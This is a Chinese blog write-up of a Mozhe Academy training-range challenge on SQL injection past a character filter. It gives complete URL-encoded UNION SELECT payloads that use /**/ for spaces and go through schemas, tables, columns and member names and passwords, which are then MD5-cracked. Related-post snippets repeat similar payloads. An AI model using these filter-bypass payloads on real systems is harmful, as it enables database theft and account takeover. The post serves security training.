墨者学院—SQL过滤字符后手工注入漏洞测试(第2题)

最新推荐文章于 2024-07-22 18:51:13 发布
最新推荐文章于 2024-07-22 18:51:13 发布
阅读量2.2k 收藏
点赞数
分类专栏: 墨者学院 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_20737293/article/details/123586239
版权
本文详细记录了一次SQL注入漏洞的测试过程,包括利用/**/替换空格进行注入,通过URL编码绕过字符过滤,以及逐步查询数据库的表名、列名,最终获取敏感信息并解密账号密码。此案例展示了SQL注入攻击的常见手法及防御措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场地址:SQL过滤字符后手工注入漏洞测试(第2题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

进入靶场

 

老规矩,用and来判断注入。

 

猜测是and或者是空格被过滤了,用/**/代替空格试试 

证据确凿,直接拷走

接下来查询order by 查询列,在第五列页面不回显,判断有四列数据

 

然后查询数据库,又被拦截了,那估计就是过滤了union或者select等字符,URL编码绕过试试

 

在第二段和第三段有回显,那就在这注入。

 

查询数据库

http://124.70.71.251:40278/new_list.php?id=0/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%73%63%68%65%6d%61%5f%6e%61%6d%65%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%73%63%68%65%6d%61%74%61

 


查询表

http://124.70.71.251:40278/new_list.php?id=0/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%73%63%68%65%6d%61=%64%61%74%61%62%61%73%65%28%29

 


查询stormgroup_member的列

http://124.70.71.251:40278/new_list.php?id=0/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%6e%61%6d%65=%27%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%27

 


查询name和password

http://124.70.71.251:40278/new_list.php?id=2/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%6e%61%6d%65%29%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%70%61%73%73%77%6f%72%64%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72

 


md5解密,得到账号密码,登录。得到flag
 

墨者学院SQL过滤字符手工注入漏洞测试(第1)
痴人说梦梦中人
11-13 355
1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。 #!/usr/bin/env python # -*- coding:UTF-8 -*- #time:2019/11/9 1:03 #author:White9527 from urllib import parse import re #查询语句 s1 = """ord...
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 462
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
墨者学院----SQL过滤字符手工注入漏洞测试(2)
qq_43590351的博客
01-26 498
SQL过滤字符手工注入漏洞测试(2) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤 尝试利用like等于号和==/**/空格==进行绕过 ?id=1/**/order/**/by/**/4 页面正常说明字段数为4 接下来利用联合查询,看是否有回显点 ...
SQL过滤字符手工注入漏洞测试(2)——<墨者学院漏洞记录>
chick11的博客
07-16 250
http://219.153.49.228:40519/new_list.php?id=1 http://219.153.49.228:40519/new_list.php?id=1' http://219.153.49.228:40519/new_list.php?id=1'%23 http://219.153.49.228:40519/new_list.php?id=1' and 1=1 经过上面几轮测试,可以看出本:空格,单引号,等号,union,select,from都过滤。 因此进行替换:
墨者 - SQL过滤字符手工注入漏洞测试(2)
吃肉唐僧的博客
07-11 673
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
墨者SQL过滤字符手工注入漏洞测试(2)
wswr的博客
03-14 1254
思路:这相比较前一提的难点就是,你它到底过滤了啥,虽然说这个是难点,但是同时也是最无所谓的难点,毕竟,我就算不知道具体过滤啥,我还是该试的都试试,记得上提是用url编码然后绕过,那延续过来这行不行呢,然后你会发现,好像确实可以,emm,那好像真就和第一没什么大区别就算啦。(PS:上的思路就是用URL编码绕过检测) 总结一下:和上没什么区别,上懂了这一样的操作马上解决 那么就快速过一遍了(列还是4,回显点是2,3) 老样子查数据库查版本 /**/union/**/select/**/1,
SQL过滤字符手工注入漏洞测试(2)
weixin_47493074的博客
10-03 272
SQL过滤字符手工注入漏洞测试(2)
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4458
决心按部就班、由浅入深地去剖析下sql注入目提供的靶场环境,完善自身解思路。本靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入目。废话不多说啦,先附上目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
最新发布
qq_48368964的博客
07-22 765
墨者学院 SQL手工注入漏洞测试(Db2数据库) 两种思路 超详细 小白也能看懂
墨者_SQL手工注入漏洞测试(Sybase数据库)
weixin_50698958的博客
10-23 848
靶场: https://www.mozhe.cn/bug/detail/b0R2Q0VJL3lnellUMjJoUmRsK1FsZz09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+Sybase,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Sybase的数据结构; 4.了解字符串的MD5加解密; 解方向 手工进行
墨者学院-SQL过滤字符手工注入漏洞测试(2)
m0_46684679的博客
12-03 431
SQL过滤字符手工注入漏洞测试(2)
墨者学院SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1301
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者 SQL过滤字符手工绕过漏洞测试(万能口令)
wswr的博客
03-18 951
总结:正经解决这的途径思路是,一种是像我这样尝试然后去找规律 猜测sql语句【ps:猜过一次后,记住思路,下次猜就会快很多了】,一种是收集万能口令的字典然后去跑字典一个一个试,具体操作是拿到靠谱的词典,然后burp抓包,然后用intruter模块去爆破 外话:遇到困难和问啊,我该想的不仅仅只是通过它,还要去思考原理,就比方这,就是通过很快,思考却要很久,这的解法,我在csnd上是暂时还没有看到和我一样思路的,所以如果我有什么错误希望大伙能沟通交流一下【c2FuIGxpYW4gcWl1cWl1bG
墨者学院-SQL过滤字符手工绕过漏洞测试(万能口令)
weixin_44697846的博客
03-15 496
根据报错,猜想语句为:username='username','a','a') and password='password'123','a','a') or 1=1#/123 也可登录,万能密码。构造账号名:admin','a','a')# 密码随意。注意到登陆失败是no.php,如果改成yes呢。还有一种方法 是使用万能密码。
墨者学院 - SQL过滤字符手工注入漏洞测试(第1)
多崎巡礼的博客
09-28 2731
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6986
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者学院 SQL过滤字符手工注入漏洞测试(第3)
a519395243的博客
12-21 1555
 手工注入 墨者学院 SQL过滤字符手工注入漏洞测试(第3) 使用sqlmap 跑,跑不出表名,所以手工注入 点击进去靶场 域名url为:   http://219.153.49.228:41774/new_list.php?id=1   第一步:判断是否有注入点     http://219.153.49.228:41774/new_list.php?id=1'    出...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3356
很简单,可以完全参照 https://blog.youkuaiyun.com/qq_42357070/article/details/81215715 进行解 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
WebSQL手工注入Sql Server数据库 (漏洞测试)
HAPPY
07-30 3899
            【WebSQL手工注入Sql Server数据库 (漏洞测试) 第一步:判断是否有注入,?id=2 and 1=1   正确;id=2 and 1=2  错误,得出有注入点。第二步:判断数据库类型:?id=2  and  exists (select  *  from  sysobjects) 显示正常, 表示是ms sql server数据库。 第三步:sqlmap...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值